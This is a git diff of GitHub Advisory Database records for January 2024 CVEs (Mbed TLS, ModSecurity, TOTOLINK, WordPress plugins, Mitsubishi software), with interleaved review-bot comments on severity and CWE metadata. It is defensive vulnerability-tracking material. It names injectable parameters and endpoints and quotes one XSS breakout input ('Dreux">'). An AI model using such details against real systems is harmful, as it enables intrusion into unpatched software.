     ],
-    "severity": null,
+    "severity": "HIGH",
     "github_reviewed": false,
     "github_reviewed_at": null,
     "nvd_published_at": "2024-01-24T19:15:08Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-vxjc-53hv-3fh8/GHSA-vxjc-53hv-3fh8.json b/advisories/unreviewed/2024/01/GHSA-vxjc-53hv-3fh8/GHSA-vxjc-53hv-3fh8.json
index b423434c65694..ab4d8d9a9b01d 100644
--- a/advisories/unreviewed/2024/01/GHSA-vxjc-53hv-3fh8/GHSA-vxjc-53hv-3fh8.json
+++ b/advisories/unreviewed/2024/01/GHSA-vxjc-53hv-3fh8/GHSA-vxjc-53hv-3fh8.json
@@ -28,7 +28,7 @@
   ],
   "database_specific": {
     "cwe_ids": [
-
+      "CWE-434"
     ],
     "severity": "HIGH",
     "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-w2fw-qqqw-v63m/GHSA-w2fw-qqqw-v63m.json b/advisories/unreviewed/2024/01/GHSA-w2fw-qqqw-v63m/GHSA-w2fw-qqqw-v63m.json
new file mode 100644
index 0000000000000..e9be4ea4ffca8
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-w2fw-qqqw-v63m/GHSA-w2fw-qqqw-v63m.json
@@ -0,0 +1,35 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-w2fw-qqqw-v63m",
+  "modified": "2024-01-31T09:30:18Z",
+  "published": "2024-01-31T09:30:18Z",
+  "aliases": [
+    "CVE-2024-23170"
+  ],
+  "details": "An issue was discovered in Mbed TLS 2.x before 2.28.7 and 3.x before 3.5.2. There was a timing side channel in RSA private operations. This side channel could be sufficient for a local attacker to recover the plaintext. It requires the attacker to send a large number of messages for decryption, as described in \"Everlasting ROBOT: the Marvin Attack\" by Hubert Kario.",
+  "severity": [
+
+  ],
+  "affected": [
+
+  ],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23170"
+    },
+    {
+      "type": "WEB",
+      "url": "https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2024-01-1/"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+
+    ],
+    "severity": null,
+    "github_reviewed": false,
+    "github_reviewed_at": null,
+    "nvd_published_at": "2024-01-31T08:15:42Z"
+  }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-w2m4-7x76-qjmh/GHSA-w2m4-7x76-qjmh.json b/advisories/unreviewed/2024/01/GHSA-w2m4-7x76-qjmh/GHSA-w2m4-7x76-qjmh.json
index da0c43462f5e6..685575eb6eb97 100644
--- a/advisories/unreviewed/2024/01/GHSA-w2m4-7x76-qjmh/GHSA-w2m4-7x76-qjmh.json
+++ b/advisories/unreviewed/2024/01/GHSA-w2m4-7x76-qjmh/GHSA-w2m4-7x76-qjmh.json
@@ -1,14 +1,17 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-w2m4-7x76-qjmh",
-  "modified": "2024-01-28T03:30:35Z",
+  "modified": "2024-02-01T21:30:30Z",
   "published": "2024-01-28T03:30:35Z",
   "aliases": [
     "CVE-2024-23739"
   ],
   "details": "An issue in Discord for macOS version 0.0.291 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.",
   "severity": [
-
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+    }
   ],
   "affected": [
 
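Review bot: GHSA-w2fw-qqqw-v63m lands with an empty `"severity": [ ]`, an empty `"cwe_ids": [ ]` and `"severity": null`, even though its `details` describes a timing side channel in RSA private operations that can recover plaintext (the Marvin attack). Any consumer that sorts or filters the feed by severity will rank this record below every scored entry in the same commit, including the MODERATE XSS records, so a null here must be read as "not yet scored", not "low"; the description text names the fixed releases (2.28.7 and 3.5.2), so the `affected` ranges are recoverable at review time. If the import pipeline allows a manual CWE before NVD assigns one, CWE-208 (Observable Timing Discrepancy) is presumably the matching class, but that should be confirmed against the vendor advisory already listed in `references`.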
@@ -27,7 +30,7 @@
     "cwe_ids": [
 
     ],
-    "severity": null,
+    "severity": "CRITICAL",
     "github_reviewed": false,
     "github_reviewed_at": null,
     "nvd_published_at": "2024-01-28T03:15:07Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-w32c-gg4j-5fxv/GHSA-w32c-gg4j-5fxv.json b/advisories/unreviewed/2024/01/GHSA-w32c-gg4j-5fxv/GHSA-w32c-gg4j-5fxv.json
index c66cee5c06655..a67426e2c6327 100644
--- a/advisories/unreviewed/2024/01/GHSA-w32c-gg4j-5fxv/GHSA-w32c-gg4j-5fxv.json
+++ b/advisories/unreviewed/2024/01/GHSA-w32c-gg4j-5fxv/GHSA-w32c-gg4j-5fxv.json
@@ -21,6 +21,10 @@
       "type": "ADVISORY",
       "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20985"
     },
+    {
+      "type": "WEB",
+      "url": "https://security.netapp.com/advisory/ntap-20240201-0003/"
+    },
     {
       "type": "WEB",
       "url": "https://www.oracle.com/security-alerts/cpujan2024.html"
diff --git a/advisories/unreviewed/2024/01/GHSA-w45w-99c9-fqr4/GHSA-w45w-99c9-fqr4.json b/advisories/unreviewed/2024/01/GHSA-w45w-99c9-fqr4/GHSA-w45w-99c9-fqr4.json
index 7884938ed9c6f..790a4706a9c32 100644
--- a/advisories/unreviewed/2024/01/GHSA-w45w-99c9-fqr4/GHSA-w45w-99c9-fqr4.json
+++ b/advisories/unreviewed/2024/01/GHSA-w45w-99c9-fqr4/GHSA-w45w-99c9-fqr4.json
@@ -21,6 +21,10 @@
       "type": "ADVISORY",
       "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20973"
     },
+    {
+      "type": "WEB",
+      "url": "https://security.netapp.com/advisory/ntap-20240201-0003/"
+    },
     {
       "type": "WEB",
       "url": "https://www.oracle.com/security-alerts/cpujan2024.html"
diff --git a/advisories/unreviewed/2024/01/GHSA-w56r-g989-xqw3/GHSA-w56r-g989-xqw3.json b/advisories/unreviewed/2024/01/GHSA-w56r-g989-xqw3/GHSA-w56r-g989-xqw3.json
new file mode 100644
index 0000000000000..9cab0f33f97f2
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-w56r-g989-xqw3/GHSA-w56r-g989-xqw3.json
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w56r-g989-xqw3", + "modified": "2024-01-30T18:30:20Z", + "published": "2024-01-30T18:30:20Z", + "aliases": [ + "CVE-2024-1019" + ], + "details": "ModSecurity / libModSecurity 3.0.0 to 3.0.11 is affected by a WAF bypass for path-based payloads submitted via specially crafted request URLs. ModSecurity v3 decodes percent-encoded characters present in request URLs before it separates the URL path component from the optional query string component. This results in an impedance mismatch versus RFC compliant back-end applications. The vulnerability hides an attack payload in the path component of the URL from WAF rules inspecting it. A back-end may be vulnerable if it uses the path component of request URLs to construct queries. Integrators and users are advised to upgrade to 3.0.12. The ModSecurity v2 release line is not affected by this vulnerability.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1019" + }, + { + "type": "WEB", + "url": "https://owasp.org/www-project-modsecurity/tab_cves#cve-2024-1019-2024-01-30" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T16:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-w5f2-rh5m-26w2/GHSA-w5f2-rh5m-26w2.json b/advisories/unreviewed/2024/01/GHSA-w5f2-rh5m-26w2/GHSA-w5f2-rh5m-26w2.json new file mode 100644 index 0000000000000..60701dd769744 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-w5f2-rh5m-26w2/GHSA-w5f2-rh5m-26w2.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w5f2-rh5m-26w2", + "modified": "2024-02-05T21:30:31Z", + "published": "2024-01-30T03:30:30Z", + "aliases": [ + "CVE-2023-51843" + ], + "details": "react-dashboard 1.4.0 is vulnerable to Cross Site Scripting (XSS) as httpOnly is not set.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51843" + }, + { + "type": "WEB", + "url": "https://github.com/flatlogic/react-dashboard/issues/65" + }, + { + "type": "WEB", + "url": "https://github.com/flatlogic/react-dashboard" + }, + { + "type": "WEB", + "url": "https://github.com/tianjk99/Cryptographic-Misuses/blob/main/CVE-2023-51843.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T01:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-w5f8-jmcg-4qrj/GHSA-w5f8-jmcg-4qrj.json b/advisories/unreviewed/2024/01/GHSA-w5f8-jmcg-4qrj/GHSA-w5f8-jmcg-4qrj.json new file mode 100644 index 0000000000000..f0bc1c1fc47c3 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-w5f8-jmcg-4qrj/GHSA-w5f8-jmcg-4qrj.json 
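Review bot: The details describe a missing `httpOnly` cookie attribute, which is a cookie-hardening gap (conventionally CWE-1004, sensitive cookie without the HttpOnly flag) rather than a cross-site scripting flaw, yet `cwe_ids` carries `"CWE-79"` and the vector rates confidentiality impact High. If the classification mirrors NVD verbatim it is expected here, but anyone triaging CWE-79 records will find no injection point described in this advisory; the one-line correction once upstream agrees would be `"CWE-1004"`. The third reference points into a repository named for cryptographic misuses, which does not obviously relate to the described issue — worth confirming that it actually documents this CVE before it ships as a reference.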
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w5f8-jmcg-4qrj", + "modified": "2024-02-01T06:31:05Z", + "published": "2024-01-30T15:30:22Z", + "aliases": [ + "CVE-2024-24325" + ], + "details": "TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setParentalRules function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24325" + }, + { + "type": "WEB", + "url": "https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/11/TOTOlink%20A3300R%20setParentalRules.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-w668-xcxf-v3gg/GHSA-w668-xcxf-v3gg.json b/advisories/unreviewed/2024/01/GHSA-w668-xcxf-v3gg/GHSA-w668-xcxf-v3gg.json index d10d3f535e3ac..34ec5910dec53 100644 --- a/advisories/unreviewed/2024/01/GHSA-w668-xcxf-v3gg/GHSA-w668-xcxf-v3gg.json +++ b/advisories/unreviewed/2024/01/GHSA-w668-xcxf-v3gg/GHSA-w668-xcxf-v3gg.json @@ -44,6 +44,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EJBMCWQ54R6ZL3MYU2D2JBW6JMZL7BQW/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-30" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-w6c8-6gw8-5gvp/GHSA-w6c8-6gw8-5gvp.json b/advisories/unreviewed/2024/01/GHSA-w6c8-6gw8-5gvp/GHSA-w6c8-6gw8-5gvp.json new file mode 100644 index 0000000000000..a441be676c43d --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-w6c8-6gw8-5gvp/GHSA-w6c8-6gw8-5gvp.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w6c8-6gw8-5gvp", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2023-6946" + ], + "details": "The Autotitle for WordPress plugin through 1.0.3 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6946" + }, + { + "type": "WEB", + "url": "https://magos-securitas.com/txt/CVE-2023-6946" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/54a00416-c7e3-44f3-8dd2-ed9e748055e6/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-w7jv-24hg-q599/GHSA-w7jv-24hg-q599.json b/advisories/unreviewed/2024/01/GHSA-w7jv-24hg-q599/GHSA-w7jv-24hg-q599.json index 9cc2a9106c322..97ee5d18db3f2 100644 --- a/advisories/unreviewed/2024/01/GHSA-w7jv-24hg-q599/GHSA-w7jv-24hg-q599.json +++ b/advisories/unreviewed/2024/01/GHSA-w7jv-24hg-q599/GHSA-w7jv-24hg-q599.json @@ -28,7 +28,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-78" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-w7vr-jmcf-cx4m/GHSA-w7vr-jmcf-cx4m.json b/advisories/unreviewed/2024/01/GHSA-w7vr-jmcf-cx4m/GHSA-w7vr-jmcf-cx4m.json new file mode 100644 index 0000000000000..46460411f735d --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-w7vr-jmcf-cx4m/GHSA-w7vr-jmcf-cx4m.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w7vr-jmcf-cx4m", + "modified": "2024-01-30T09:30:34Z", + "published": "2024-01-30T09:30:34Z", + "aliases": [ + "CVE-2023-6942" + ], + "details": "Missing Authentication for Critical Function vulnerability in Mitsubishi Electric Corporation EZSocket versions 3.0 and later, FR Configurator2 all versions, GT Designer3 Version1(GOT1000) all versions, GT Designer3 Version1(GOT2000) all versions, GX Works2 versions 1.11M and later, GX Works3 all versions, MELSOFT Navigator versions 1.04E and later, MT Works2 all versions, MX Component versions 4.00A and later and MX OPC Server DA/UA all versions allows a remote unauthenticated attacker to bypass authentication by sending specially crafted packets and connect to the products illegally.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6942" + }, + { + "type": "WEB", + "url": "https://jvn.jp/vu/JVNVU95103362" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-030-02" + }, + { + "type": "WEB", + "url": "https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-020_en.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T09:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-w85m-xv37-g9v4/GHSA-w85m-xv37-g9v4.json b/advisories/unreviewed/2024/01/GHSA-w85m-xv37-g9v4/GHSA-w85m-xv37-g9v4.json index b44f668daa4e2..ce87a07cc439f 100644 --- a/advisories/unreviewed/2024/01/GHSA-w85m-xv37-g9v4/GHSA-w85m-xv37-g9v4.json +++ b/advisories/unreviewed/2024/01/GHSA-w85m-xv37-g9v4/GHSA-w85m-xv37-g9v4.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-w85m-xv37-g9v4", - "modified": "2024-01-19T21:30:35Z", + "modified": "2024-01-30T15:30:21Z", "published": "2024-01-19T21:30:35Z", "aliases": [ "CVE-2023-47035" ], "details": "RPTC 0x3b08c was discovered to not conduct status checks on the parameter tradingOpen. This vulnerability can allow attackers to conduct unauthorized transfer operations.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-19T20:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-w8x8-g534-x4rp/GHSA-w8x8-g534-x4rp.json b/advisories/unreviewed/2024/01/GHSA-w8x8-g534-x4rp/GHSA-w8x8-g534-x4rp.json index dadbf893e80c8..9a2a34d10e51b 100644 --- a/advisories/unreviewed/2024/01/GHSA-w8x8-g534-x4rp/GHSA-w8x8-g534-x4rp.json +++ b/advisories/unreviewed/2024/01/GHSA-w8x8-g534-x4rp/GHSA-w8x8-g534-x4rp.json @@ -36,6 +36,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-wfg5-fmwh-w25j/GHSA-wfg5-fmwh-w25j.json b/advisories/unreviewed/2024/01/GHSA-wfg5-fmwh-w25j/GHSA-wfg5-fmwh-w25j.json new file mode 100644 index 0000000000000..55b270c6535d0 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-wfg5-fmwh-w25j/GHSA-wfg5-fmwh-w25j.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wfg5-fmwh-w25j", + "modified": "2024-01-30T06:30:23Z", + "published": "2024-01-30T06:30:23Z", + "aliases": [ + "CVE-2024-1029" + ], + "details": "A vulnerability was found in Cogites eReserv 7.7.58 and classified as problematic. Affected by this issue is some unknown functionality of the file /front/admin/tenancyDetail.php. The manipulation of the argument Nom with the input Dreux\"> leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252302 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1029" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252302" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252302" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T06:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-wfhp-x3v9-6957/GHSA-wfhp-x3v9-6957.json b/advisories/unreviewed/2024/01/GHSA-wfhp-x3v9-6957/GHSA-wfhp-x3v9-6957.json new file mode 100644 index 0000000000000..dfba661921b6f --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-wfhp-x3v9-6957/GHSA-wfhp-x3v9-6957.json 
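Review bot: The stored CVSS vector and the severity label disagree: `CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N` evaluates to 3.5 (Low) under the CVSS 3.1 base formula, while `database_specific.severity` is `"MODERATE"`. The two values appear to come from different sources — the vector matches a VulDB-style rating and the label may follow a separate analysis — but whichever is authoritative, the record should carry a matching pair, e.g. `"severity": "LOW"` if the vector stands, or the vector that actually produced the Moderate label. The other new and updated records in this chunk have labels consistent with their vectors, so this one will mis-rank in any consumer that trusts the label without recomputing the score.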
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wfhp-x3v9-6957", + "modified": "2024-01-30T15:30:22Z", + "published": "2024-01-30T15:30:22Z", + "aliases": [ + "CVE-2024-0675" + ], + "details": "Vulnerability of improper checking for unusual or exceptional conditions\n\nin Lamassu Bitcoin ATM Douro machines, in its 7.1 version,\n\n the exploitation of which could allow an attacker with physical access to the ATM to escape kiosk mode, access the underlying Xwindow interface and execute arbitrary commands as an unprivileged user.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0675" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-754" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-wgc3-54w5-j2pq/GHSA-wgc3-54w5-j2pq.json b/advisories/unreviewed/2024/01/GHSA-wgc3-54w5-j2pq/GHSA-wgc3-54w5-j2pq.json index 1b3b4b4d12247..3b36ad72e1c8f 100644 --- a/advisories/unreviewed/2024/01/GHSA-wgc3-54w5-j2pq/GHSA-wgc3-54w5-j2pq.json +++ b/advisories/unreviewed/2024/01/GHSA-wgc3-54w5-j2pq/GHSA-wgc3-54w5-j2pq.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-wgc3-54w5-j2pq", - "modified": "2024-01-26T00:30:27Z", + "modified": "2024-01-29T18:31:48Z", "published": "2024-01-26T00:30:27Z", "aliases": [ "CVE-2024-22922" ], "details": "An issue in Projectworlds Vistor Management Systemin PHP v.1.0 allows a remtoe attacker to escalate privileges via a crafted script to the login page in the POST/index.php", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -33,9 +36,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-269" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T22:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-wgfc-hm58-hx63/GHSA-wgfc-hm58-hx63.json b/advisories/unreviewed/2024/01/GHSA-wgfc-hm58-hx63/GHSA-wgfc-hm58-hx63.json new file mode 100644 index 0000000000000..00c5253033426 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-wgfc-hm58-hx63/GHSA-wgfc-hm58-hx63.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wgfc-hm58-hx63", + "modified": "2024-01-29T21:30:27Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2023-4554" + ], + "details": "Improper Restriction of XML External Entity Reference vulnerability in OpenText AppBuilder on Windows, Linux allows Server Side Request Forgery, Probe System Files.\n\nAppBuilder's XML processor is vulnerable to XML External Entity Processing (XXE), allowing an authenticated user to upload specially crafted XML files to induce server-side request forgery, disclose files local to the server that processes them.\n\n\nThis issue affects AppBuilder: from 21.2 before 23.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4554" + }, + { + "type": "WEB", + "url": "https://support.opentext.com/csm?id=ot_kb_search&kb_category=61648712db61781068cfd6c4e296197b" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-611" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T21:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-whch-9pr2-9fvq/GHSA-whch-9pr2-9fvq.json b/advisories/unreviewed/2024/01/GHSA-whch-9pr2-9fvq/GHSA-whch-9pr2-9fvq.json new file mode 100644 index 0000000000000..cc57158055eba --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-whch-9pr2-9fvq/GHSA-whch-9pr2-9fvq.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-whch-9pr2-9fvq", + "modified": "2024-01-31T03:30:31Z", + "published": "2024-01-31T03:30:31Z", + "aliases": [ + "CVE-2024-1069" + ], + "details": "The Contact Form Entries plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation on the 'view_page' function in versions up to, and including, 1.3.2. This makes it possible for authenticated attackers with administrator-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1069" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/contact-form-entries/trunk/includes/plugin-pages.php?rev=3003884#L1213" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3028640/contact-form-entries#file1" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/120313be-9f98-4448-9f5d-a77186a6ff08?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-wmcg-jxc8-7m7p/GHSA-wmcg-jxc8-7m7p.json b/advisories/unreviewed/2024/01/GHSA-wmcg-jxc8-7m7p/GHSA-wmcg-jxc8-7m7p.json new file mode 100644 index 0000000000000..a898cd1f931ea --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-wmcg-jxc8-7m7p/GHSA-wmcg-jxc8-7m7p.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wmcg-jxc8-7m7p", + "modified": "2024-01-30T09:30:34Z", + "published": "2024-01-30T09:30:34Z", + "aliases": [ + "CVE-2023-7225" + ], + "details": "The MapPress Maps for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the width and height parameters in all versions up to, and including, 2.88.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7225" + }, + { + "type": "WEB", + "url": "https://advisory.abay.sh/cve-2023-7225/" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3023266%40mappress-google-maps-for-wordpress%2Ftrunk&old=3022439%40mappress-google-maps-for-wordpress%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fce76126-0cfd-464f-b644-45d4301e958d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T08:15:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-wmpm-9r6p-rpww/GHSA-wmpm-9r6p-rpww.json b/advisories/unreviewed/2024/01/GHSA-wmpm-9r6p-rpww/GHSA-wmpm-9r6p-rpww.json index fbeda3fe5bd08..b239030e88fbc 100644 --- a/advisories/unreviewed/2024/01/GHSA-wmpm-9r6p-rpww/GHSA-wmpm-9r6p-rpww.json +++ b/advisories/unreviewed/2024/01/GHSA-wmpm-9r6p-rpww/GHSA-wmpm-9r6p-rpww.json 
